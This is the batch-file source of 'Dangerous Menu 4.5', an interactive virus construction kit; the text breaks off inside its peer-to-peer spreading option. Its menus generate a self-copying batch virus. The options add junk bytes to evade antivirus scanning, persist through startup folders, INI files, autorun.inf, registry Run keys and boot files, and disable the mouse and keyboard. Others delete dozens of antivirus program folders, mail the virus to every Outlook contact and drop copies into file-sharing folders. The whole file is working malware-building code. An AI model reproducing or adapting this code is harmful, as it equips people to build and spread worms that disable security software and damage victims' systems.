@echo off
cls

:m00
cls
echo.
echo.
echo.
echo                      ÉÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ»
echo                      ³ °±²Û Dangerous Menu 4.5 [DvL] Û²±° ³
echo                      ÈÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¼
echo.
echo.
echo.     Fooling AV`z
echo      ÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
echo.
echo      Want EICAR string ? (Y/N):
choice /c:yn>nul
if errorlevel 2 goto m01
if errorlevel 1 goto a00

:a00
cls
@ctty nul
echo.randomize(timer)>batvirus.vbs
echo.set a=CreateObject("scripting.filesystemobject")>>batvirus.vbs
echo.set b=a.CreateTextFile ("batvirus.txt")>>batvirus.vbs
echo.b.Writeline "X5O!P%%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*">>batvirus.vbs
ctty con
cls
echo.
echo.
echo.
echo                      ÉÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ»
echo                      ³ °±²Û Dangerous Menu 4.5 [DvL] Û²±° ³
echo                      ÈÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¼
echo.
echo.
echo.     Fooling AV`z
echo      ÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
echo.
echo      Want 1000 fake bytes ? (Y/N):
choice /c:yn>nul
if errorlevel 2 goto a02
if errorlevel 1 goto a01

:a01
cls
@ctty nul
echo.For c = 1 To 10>>batvirus.vbs
echo.RndStr = "">>batvirus.vbs
echo.For CLoop = 1 To 99>>batvirus.vbs
echo.Randomize>>batvirus.vbs
echo.RndStr = RndStr & Chr(Int((26 * Rnd) + 97))>>batvirus.vbs
echo.Next>>batvirus.vbs
echo.NineStr = NineStr & RndStr & vbCrLf>>batvirus.vbs
echo.Next>>batvirus.vbs
echo.NineStr = Left(NineStr, Len(NineStr) - 2)>>batvirus.vbs
echo.b.Writeline NineStr>>batvirus.vbs
ctty con
goto a04

:a02
cls
@ctty nul
echo.b.Writeline "::">>batvirus.vbs
echo.b.Writeline ":: Generated by Dangerous Menu 4.5 [DvL]-[rRLF]">>batvirus.vbs
echo.b.Writeline "::">>batvirus.vbs
echo.b.Writeline "@echo off">>batvirus.vbs
echo.b.Writeline "@ver"&chr(124)&"find /i "&chr(34)&"XP"&chr(34)&chr(124)&"if errorlevel 1 ctty nul"&chr(124)&"if not errorlevel 1 exit">>batvirus.vbs
echo.b.Writeline "break off">>batvirus.vbs
echo.b.Writeline "echo.on error resume next>%%windir%%\tmpdelis.vbs">>batvirus.vbs
echo.b.Writeline "echo.set ab=CreateObject("&chr(34)&"wscript.shell"&chr(34)&")>>%%windir%%\tmpdelis.vbs">>batvirus.vbs
echo.b.Writeline "echo.set d=("&chr(34)&"Scripting.FileSystem.Object"&chr(34)&")>>%%windir%%\tmpdelis.vbs">>batvirus.vbs
echo.b.Writeline "copy %%0 %%windir%%\tmpdelis.bat>nul">>batvirus.vbs
ctty con
goto m02

:m01
cls
echo.
echo.
echo.
echo                      ÉÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ»
echo                      ³ °±²Û Dangerous Menu 4.5 [DvL] Û²±° ³
echo                      ÈÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¼
echo.
echo.
echo.     Fooling AV`z
echo      ÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
echo.
echo      Want 1000 fake bytes ? (Y/N):
choice /c:yn>nul
if errorlevel 2 goto a04b
if errorlevel 1 goto a03

:a03
cls
@ctty nul
echo.randomize(timer)>batvirus.vbs
echo.set a=CreateObject("scripting.filesystemobject")>>batvirus.vbs
echo.set b=a.CreateTextFile ("batvirus.txt")>>batvirus.vbs
echo.For c = 1 To 10>>batvirus.vbs
echo.RndStr = "">>batvirus.vbs
echo.For CLoop = 1 To 99>>batvirus.vbs
echo.Randomize>>batvirus.vbs
echo.RndStr = RndStr & Chr(Int((26 * Rnd) + 97))>>batvirus.vbs
echo.Next>>batvirus.vbs
echo.NineStr = NineStr & RndStr & vbCrLf>>batvirus.vbs
echo.Next>>batvirus.vbs
echo.NineStr = Left(NineStr, Len(NineStr) - 2)>>batvirus.vbs
echo.b.Writeline NineStr>>batvirus.vbs
ctty con
goto a04

:a04b
cls
@ctty nul
echo.randomize(timer)>batvirus.vbs
echo.set a=CreateObject("scripting.filesystemobject")>>batvirus.vbs
echo.set b=a.CreateTextFile ("batvirus.txt")>>batvirus.vbs
ctty con

:a04
cls
@ctty nul
echo.b.Writeline "::">>batvirus.vbs
echo.b.Writeline ":: Generated by Dangerous Menu 4.5 [DvL]-[rRLF]">>batvirus.vbs
echo.b.Writeline "::">>batvirus.vbs
echo.b.Writeline "@echo off">>batvirus.vbs
echo.b.Writeline "@ver"&chr(124)&"find /i "&chr(34)&"XP"&chr(34)&chr(124)&"if errorlevel 1 ctty nul"&chr(124)&"if not errorlevel 1 exit">>batvirus.vbs
echo.b.Writeline "break off">>batvirus.vbs
echo.b.Writeline "echo.on error resume next>%%windir%%\tmpdelis.vbs">>batvirus.vbs
echo.b.Writeline "echo.set ab=CreateObject("&chr(34)&"wscript.shell"&chr(34)&")>>%%windir%%\tmpdelis.vbs">>batvirus.vbs
echo.b.Writeline "echo.set d=("&chr(34)&"Scripting.FileSystem.Object"&chr(34)&")>>%%windir%%\tmpdelis.vbs">>batvirus.vbs
echo.b.Writeline "copy %%0 %%windir%%\tmpdelis.bat>nul">>batvirus.vbs
ctty con

:m02
cls
echo.
echo.
echo.
echo                      ÉÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ»
echo                      ³ °±²Û Dangerous Menu 4.5 [DvL] Û²±° ³
echo                      ÈÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¼
echo.
echo.
echo        Running options
echo        ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
echo.
echo    1 - Run via STARTUP folder
echo    2 - Run via WIN.INI file
echo    3 - Run via SYSTEM.INI file
echo    4 - Run via AUTORUN.INF file
echo    5 - Run via REGISTRY keys
echo    6 - Run via AUTOEXEC.BAT file
echo    7 - Run via WINSTART.BAT FILE
echo    8 - Run via CONFIG.SYS file
echo.
echo.
echo    Your choice:
choice /c:12345678>nul
if errorlevel 8 goto a11
if errorlevel 7 goto a10
if errorlevel 6 goto a09
if errorlevel 5 goto m03
if errorlevel 4 goto a08
if errorlevel 3 goto a07
if errorlevel 2 goto a06
if errorlevel 1 goto a05

:a05
cls
@ctty nul
echo.b.Writeline "copy %%0 %%windir%%\startm~1\programs\startup\tmpdelis.bat>nul">>batvirus.vbs
echo.b.Writeline "copy %%0 %%windir%%\startm~1\progra~1\autost~1\tmpdelis.bat>nul">>batvirus.vbs
echo.b.Writeline "copy %%0 %%windir%%\startm~1\progra~1\opstar~1\tmpdelis.bat>nul">>batvirus.vbs
echo.b.Writeline "copy %%0 %%windir%%\alluse~1\startm~1\programs\startup\tmpdelis.bat>nul">>batvirus.vbs
echo.b.Writeline "copy %%0 %%windir%%\alluse~1\menuin~1\progra~1\iniciar\tmpdelis.bat>nul">>batvirus.vbs
echo.b.Writeline "copy %%0 %%windir%%\menúin~1\progra~1\inicio\tmpdelis.bat>nul">>batvirus.vbs
echo.b.Writeline "copy %%0 %%windir%%\menudé~1\progra~1\démarr~1\tmpdelis.bat>nul">>batvirus.vbs
ctty con
goto m04

:a06
cls
@ctty nul
echo.b.Writeline "find /v /i "&Chr(34)&"[windows]"&Chr(34)&Chr(60)&"%%windir%%\win.ini>1">>batvirus.vbs
echo.b.Writeline "find /v /i "&Chr(34)&"load="&Chr(34)&Chr(60)&"1>2">>batvirus.vbs
echo.b.Writeline "find /v /i "&Chr(34)&"run="&Chr(34)&Chr(60)&"2>1">>batvirus.vbs
echo.b.Writeline "find /v /i "&Chr(34)&"NullPort="&Chr(34)&Chr(60)&"1>2">>batvirus.vbs
echo.b.Writeline "deltree/y 1>nul">>batvirus.vbs
echo.b.Writeline "echo.[windows]>%%windir%%\win.ini">>batvirus.vbs
echo.b.Writeline "echo.load=%windir%\tmpdelis.bat>>%%windir%%\win.ini">>batvirus.vbs
echo.b.Writeline "echo.run=>>%%windir%%\win.ini">>batvirus.vbs
echo.b.Writeline "echo.NullPort=None>>%%windir%%\win.ini">>batvirus.vbs
echo.b.Writeline "echo.>>%%windir%%\win.ini">>batvirus.vbs
echo.b.Writeline "type 2>>%%windir%%\win.ini">>batvirus.vbs
echo.b.Writeline "deltree/y 2>nul">>batvirus.vbs
ctty con
goto m04

:a07
cls
@ctty nul
echo.b.Writeline "find /v /i "&Chr(34)&"[boot]"&Chr(34)&Chr(60)&"%%windir%%\system.ini>1">>batvirus.vbs
echo.b.Writeline "find /v /i "&Chr(34)&"shell=explorer.exe"&Chr(34)&Chr(60)&"1>2">>batvirus.vbs
echo.b.Writeline "deltree/y 1>nul">>batvirus.vbs
echo.b.Writeline "echo.[boot]>%%windir%%\system.ini">>batvirus.vbs
echo.b.Writeline "echo.Shell=Explorer.exe %windir%\tmpdelis.bat>>%%windir%%\system.ini">>batvirus.vbs
echo.b.Writeline "echo.>>%%windir%%\system.ini">>batvirus.vbs
echo.b.Writeline "type 2>>%%windir%%\system.ini">>batvirus.vbs
echo.b.Writeline "deltree/y 2>nul">>batvirus.vbs
ctty con
goto m04

:a08
cls
@ctty nul
echo.b.Writeline "echo.[AutoRun]>%%windir%%\tmpdelis.inf">>batvirus.vbs
echo.b.Writeline "echo.open=%windir%\system\"&c&"\tmpdelis.bat>>%%windir%%\tmpdelis.inf">>batvirus.vbs
echo.b.Writeline "for %%%%a in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z) do %%comspec%% nul /f /c if exist %%%%a:\nul copy %%windir%%\system\tmpdelis.inf %%%%a:\autorun.inf /y">>batvirus.vbs
ctty con
goto m04

:a09
cls
@ctty nul
echo.b.Writeline "echo.@call %%windir%%\tmpdelis.bat>>c:\autoexec.bat">>batvirus.vbs
ctty con
goto m04

:a10
cls
@ctty nul
echo.b.Writeline "echo.@call %%windir%%\tmpdelis.bat>%%windir%%\winstart.bat">>batvirus.vbs
ctty con
goto m04

:a11
cls
@ctty nul
echo.b.Writeline "copy %%0 c:\tmpdelis.bat">>batvirus.vbs
echo.b.Writeline "echo.shell=c:\command.com /e:20000 /k c:\tmpdelis.bat>>c:\config.sys">>batvirus.vbs
ctty con
goto m04

:m03
cls
echo.
echo.
echo.
echo                      ÉÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ»
echo                      ³ °±²Û Dangerous Menu 4.5 [DvL] Û²±° ³
echo                      ÈÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¼
echo.
echo.
echo        Registry startup
echo        ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
echo.
echo    1 - Run             (LOCAL MACHINE)
echo    2 - Run-            (LOCAL MACHINE)
echo    3 - RunOnce         (LOCAL MACHINE)
echo    4 - RunServices     (LOCAL MACHINE)
echo    5 - RunServices-    (LOCAL MACHINE)
echo    6 - RunServicesOnce (LOCAL MACHINE)
echo    7 - Run             (CURRENT USER)
echo    8 - RunOnce         (CURRENT USER)
echo    9 - ActiveX Component
echo.
echo.
echo    Your choice:
choice /c:123456789>nul
if errorlevel 9 goto a20
if errorlevel 8 goto a19
if errorlevel 7 goto a18
if errorlevel 6 goto a17
if errorlevel 5 goto a16
if errorlevel 4 goto a15
if errorlevel 3 goto a14
if errorlevel 2 goto a13
if errorlevel 1 goto a12

:a12
cls
@ctty nul
echo.b.Writeline "echo.REGEDIT4>%%windir%%\tmpdelis.reg">>batvirus.vbs
echo.b.Writeline "echo.>>%%windir%%\tmpdelis.reg">>batvirus.vbs
echo.b.Writeline "echo.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>%%windir%%\tmpdelis.reg">>batvirus.vbs
ctty con
goto a21

:a13
cls
@ctty nul
echo.b.Writeline "echo.REGEDIT4>%%windir%%\tmpdelis.reg">>batvirus.vbs
echo.b.Writeline "echo.>>%%windir%%\tmpdelis.reg">>batvirus.vbs
echo.b.Writeline "echo.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run-]>>%%windir%%\tmpdelis.reg">>batvirus.vbs
ctty con
goto a21

:a14
cls
@ctty nul
echo.b.Writeline "echo.REGEDIT4>%%windir%%\tmpdelis.reg">>batvirus.vbs
echo.b.Writeline "echo.>>%%windir%%\tmpdelis.reg">>batvirus.vbs
echo.b.Writeline "echo.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]>>%%windir%%\tmpdelis.reg">>batvirus.vbs
ctty con
goto a21

:a15
cls
@ctty nul
echo.b.Writeline "echo.REGEDIT4>%%windir%%\tmpdelis.reg">>batvirus.vbs
echo.b.Writeline "echo.>>%%windir%%\tmpdelis.reg">>batvirus.vbs
echo.b.Writeline "echo.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]>>%%windir%%\tmpdelis.reg">>batvirus.vbs
ctty con
goto a21

:a16
cls
@ctty nul
echo.b.Writeline "echo.REGEDIT4>%%windir%%\tmpdelis.reg">>batvirus.vbs
echo.b.Writeline "echo.>>%%windir%%\tmpdelis.reg">>batvirus.vbs
echo.b.Writeline "echo.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices-]>>%%windir%%\tmpdelis.reg">>batvirus.vbs
ctty con
goto a21

:a17
cls
@ctty nul
echo.b.Writeline "echo.REGEDIT4>%%windir%%\tmpdelis.reg">>batvirus.vbs
echo.b.Writeline "echo.>>%%windir%%\tmpdelis.reg">>batvirus.vbs
echo.b.Writeline "echo.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce]>>%%windir%%\tmpdelis.reg">>batvirus.vbs
ctty con
goto a21

:a18
cls
@ctty nul
echo.b.Writeline "echo.REGEDIT4>%%windir%%\tmpdelis.reg">>batvirus.vbs
echo.b.Writeline "echo.>>%%windir%%\tmpdelis.reg">>batvirus.vbs
echo.b.Writeline "echo.[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>%%windir%%\tmpdelis.reg">>batvirus.vbs
ctty con
goto a21

:a19
cls
@ctty nul
echo.b.Writeline "echo.REGEDIT4>%%windir%%\tmpdelis.reg">>batvirus.vbs
echo.b.Writeline "echo.>>%%windir%%\tmpdelis.reg">>batvirus.vbs
echo.b.Writeline "echo.[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]>>%%windir%%\tmpdelis.reg">>batvirus.vbs
ctty con
goto a21

:a20
cls
@ctty nul
echo.b.Writeline "echo.ab.RegWrite "&chr(34)&"HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\KeyName\StubPath"&chr(34)&","&chr(34)&"%windir%\tmpdelis.bat"&chr(34)&">>%windir%\tmpdelis.vbs">>batvirus.vbs
ctty con
goto m04

:a21
cls
@ctty nul
echo.b.Writeline "echo."&chr(34)&"a"&chr(34)&"="&chr(34)&"%windir%\tmpdelis.bat"&chr(34)&">>%%windir%%\tmpdelis.reg">>batvirus.vbs
echo.b.Writeline "regedit /s %%windir%%\tmpdelis.reg">>batvirus.vbs
ctty con

:m04
cls
echo.
echo.
echo.
echo                      ÉÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ»
echo                      ³ °±²Û Dangerous Menu 4.5 [DvL] Û²±° ³
echo                      ÈÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¼
echo.
echo.
echo        Mouse & keyboard payloads
echo        ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
echo.
echo        Disable mouse ? (Y/N):
choice /c:yn>nul
if errorlevel 2 goto m05
if errorlevel 1 goto a22

:a22
cls
@ctty nul
echo.b.Writeline "rundll32 mouse,disable">>batvirus.vbs
ctty con
goto m06

:m05
cls
echo.
echo.
echo.
echo                      ÉÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ»
echo                      ³ °±²Û Dangerous Menu 4.5 [DvL] Û²±° ³
echo                      ÈÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¼
echo.
echo.
echo        Mouse & keyboard payloads
echo        ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
echo.
echo        Swap mouse buttons ? (Y/N):
choice /c:yn>nul
if errorlevel 2 goto m06
if errorlevel 1 goto a23

:a23
cls
@ctty nul
echo.b.Writeline "rundll32 user,swapmousebutton">>batvirus.vbs
ctty con

:m06
cls
echo.
echo.
echo.
echo                      ÉÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ»
echo                      ³ °±²Û Dangerous Menu 4.5 [DvL] Û²±° ³
echo                      ÈÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¼
echo.
echo.
echo        Mouse & keyboard payloads
echo        ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
echo.
echo        Disable keyboard ? (Y/N):
echo.
choice /c:yn>nul
if errorlevel 2 goto m07
if errorlevel 1 goto a24

:a24
cls
@ctty nul
echo.b.Writeline "rundll32 keyboard,disable">>batvirus.vbs
ctty con

:m07
cls
echo.
echo.
echo.
echo                      ÉÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ»
echo                      ³ °±²Û Dangerous Menu 4.5 [DvL] Û²±° ³
echo                      ÈÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¼
echo.
echo.
echo        Retro
echo        ÄÄÄÄÄ
echo.
echo.
echo        Delete AntiViruses ? (Y/N):
echo.
choice /c:yn>nul
if errorlevel 2 goto m08
if errorlevel 1 goto a25

:a25
cls
@ctty nul
echo.b.Writeline "deltree/y c:\antiba*>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\antivi*>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\av*>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\bitdef*>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\comman~1\>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\cleancih\>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\esafen\>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\findvi~1\>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\f-*>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\fwin*>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\inocul*>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\kasper*>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\mcafee*>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\msav\>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\norman\>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\norton*>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\pav\>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\pccill~1\>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\pc-cil~1\>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\rav\>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\softwin\>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\tbav*>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\toolkit\>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\trendm~1\>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\trex\>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\virus*>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\vpc\>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\vs95\>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\zonela*>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\progra~1\antiba*>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\progra~1\av*>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\progra~1\bitdef*>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\progra~1\comman~1\>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\progra~1\common~1\avp*>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\progra~1\common~1\syman*>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\progra~1\datafe~1\>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\progra~1\deerfi*>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\progra~1\f-*>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\progra~1\findvi~1\>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\progra~1\fsi\>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\progra~1\fwin*>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\progra~1\grisoft\>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\progra~1\inocul*>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\progra~1\kasper*>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\progra~1\mcafe*>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\progra~1\mindso~1\>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\progra~1\norman\>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\progra~1\norton*>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\progra~1\pandas~1\>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\progra~1\protec*>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\progra~1\quickh~1\>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\progra~1\rav\>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\progra~1\signal9\>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\progra~1\softwin\>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\progra~1\spysto~1\>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\progra~1\syman*>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\progra~1\tbav\>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\progra~1\tinype~1\>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\progra~1\trend*>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\progra~1\trojan*>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\progra~1\virus*>nul">>batvirus.vbs
echo.b.Writeline "deltree/y c:\progra~1\zonela*>nul">>batvirus.vbs
ctty con

:m08
cls
echo.
echo.
echo.
echo                      ÉÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ»
echo                      ³ °±²Û Dangerous Menu 4.5 [DvL] Û²±° ³
echo                      ÈÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¼
echo.
echo.
echo        Internet spreading
echo        ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
echo.
echo        Spread via Outlook Express ? (Y/N):
echo.
choice /c:yn>nul
if errorlevel 2 goto m09
if errorlevel 1 goto a26

:a26
cls
@ctty nul
echo.b.Writeline "set a=dress">>batvirus.vbs
echo.b.Writeline "set b=Entr">>batvirus.vbs
echo.b.Writeline "set c=ists">>batvirus.vbs
echo.b.Writeline "echo.set e=CreateObject(d)>>%%windir%%\tmpdelis.vbs">>batvirus.vbs
echo.b.Writeline "echo.set f=CreateObject("&chr(34)&"Outlook.Application"&chr(34)&")>>%%windir%%\tmpdelis.vbs">>batvirus.vbs
echo.b.Writeline "echo.set g=WScript.CreateObject("&chr(34)&"Outlook.Application"&chr(34)&")>>%%windir%%\tmpdelis.vbs">>batvirus.vbs
echo.b.Writeline "echo.set h=g.GetNameSpace("&chr(34)&"MAPI"&chr(34)&")>>%%windir%%\tmpdelis.vbs">>batvirus.vbs
echo.b.Writeline "echo.set i=h.Ad%%a%%L%%c%%(1)>>%%windir%%\tmpdelis.vbs">>batvirus.vbs
echo.b.Writeline "echo.set ae=i.Ad%%a%%%%b%%ies>>%%windir%%\tmpdelis.vbs">>batvirus.vbs
echo.b.Writeline "echo.for x=1 To ae.Count>>%%windir%%\tmpdelis.vbs">>batvirus.vbs
echo.b.Writeline "echo.set j=f.CreateItem(0)>>%%windir%%\tmpdelis.vbs">>batvirus.vbs
echo.b.Writeline "echo.set k=j>>%%windir%%\tmpdelis.vbs">>batvirus.vbs
echo.b.Writeline "echo.k.to=f.GetNameSpace("&chr(34)&"MAPI"&chr(34)&").Ad%%a%%L%%c%%(1).Ad%%a%%%%b%%ies(x)>>%%windir%%\tmpdelis.vbs">>batvirus.vbs
echo.b.Writeline "echo.k.Subject="&chr(34)&chr(34)&">>%%windir%%\tmpdelis.vbs">>batvirus.vbs
echo.b.Writeline "echo.k.Body="&chr(34)&chr(34)&">>%%windir%%\tmpdelis.vbs">>batvirus.vbs
echo.b.Writeline "echo.k.Attachments.Add("&chr(34)&"C:\windows\tmpdelis.bat"&chr(34)&")>>%%windir%%\tmpdelis.vbs">>batvirus.vbs
echo.b.Writeline "echo.k.send>>%%windir%%\tmpdelis.vbs">>batvirus.vbs
echo.b.Writeline "echo.Next>>%%windir%%\tmpdelis.vbs">>batvirus.vbs
echo.b.Writeline "echo.f.Quit>>%%windir%%\tmpdelis.vbs">>batvirus.vbs
echo.b.Writeline "set a=">>batvirus.vbs
echo.b.Writeline "set b=">>batvirus.vbs
echo.b.Writeline "set c=">>batvirus.vbs
ctty con

:m09
cls
echo.
echo.
echo.
echo                      ÉÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ»
echo                      ³ °±²Û Dangerous Menu 4.5 [DvL] Û²±° ³
echo                      ÈÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¼
echo.
echo.
echo        Internet spreading
echo        ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
echo.
echo        Spread via P2P ? (Y/N):
echo.
choice /c:yn>nul
if errorlevel 2 goto m10
if errorlevel 1 goto a27

:a27
cls
@ctty nul
echo.b.Writeline "copy %%0 c:\download\tmpdelis.bat>nul">>batvirus.vbs
echo.b.Writeline "copy %%0 c:\downlo~1\tmpdelis.bat>nul">>batvirus.vbs
echo.b.Writeline "copy %%0 c:\eigene~1\tmpdelis.bat>nul">>batvirus.vbs
echo.b.Writeline "copy %%0 c:\kazaa\myshar~1\tmpdelis.bat>nul">>batvirus.vbs
echo.b.Writeline "copy %%0 c:\mesdoc~1\tmpdelis.bat>nul">>batvirus.vbs
echo.b.Writeline "copy %%0 c:\meusdo~1\tmpdelis.bat>nul">>batvirus.vbs
echo.b.Writeline "copy %%0 c:\mydocu~1\tmpdelis.bat>nul">>batvirus.vbs
echo.b.Writeline "copy %%0 c:\mydown~1\tmpdelis.bat>nul">>batvirus.vbs
echo.b.Writeline "copy %%0 c:\progra~1\applej~1\incoming\tmpdelis.bat>nul">>batvirus.vbs
echo.b.Writeline "copy %%0 c:\progra~1\bearsh~1\shared\tmpdelis.bat>nul">>batvirus.vbs
echo.b.Writeline "copy %%0 c:\progra~1\edonke~1\incoming\tmpdelis.bat>nul">>batvirus.vbs
echo.b.Writeline "copy %%0 c:\progra~1\emule\incoming\tmpdelis.bat>nul">>batvirus.vbs
echo.b.Writeline "copy %%0 c:\progra~1\grokster\mygrok~1\tmpdelis.bat>nul">>batvirus.vbs
echo.b.Writeline "copy %%0 c:\progra~1\icq\shared~1\tmpdelis.bat>nul">>batvirus.vbs
echo.b.Writeline "copy %%0 c:\progra~1\kazaa\myshar~1\tmpdelis.bat>nul">>batvirus.vbs
echo.b.Writeline "copy %%0 c:\progra~1\kazaal~1\myshar~1\tmpdelis.bat>nul">>batvirus.vbs
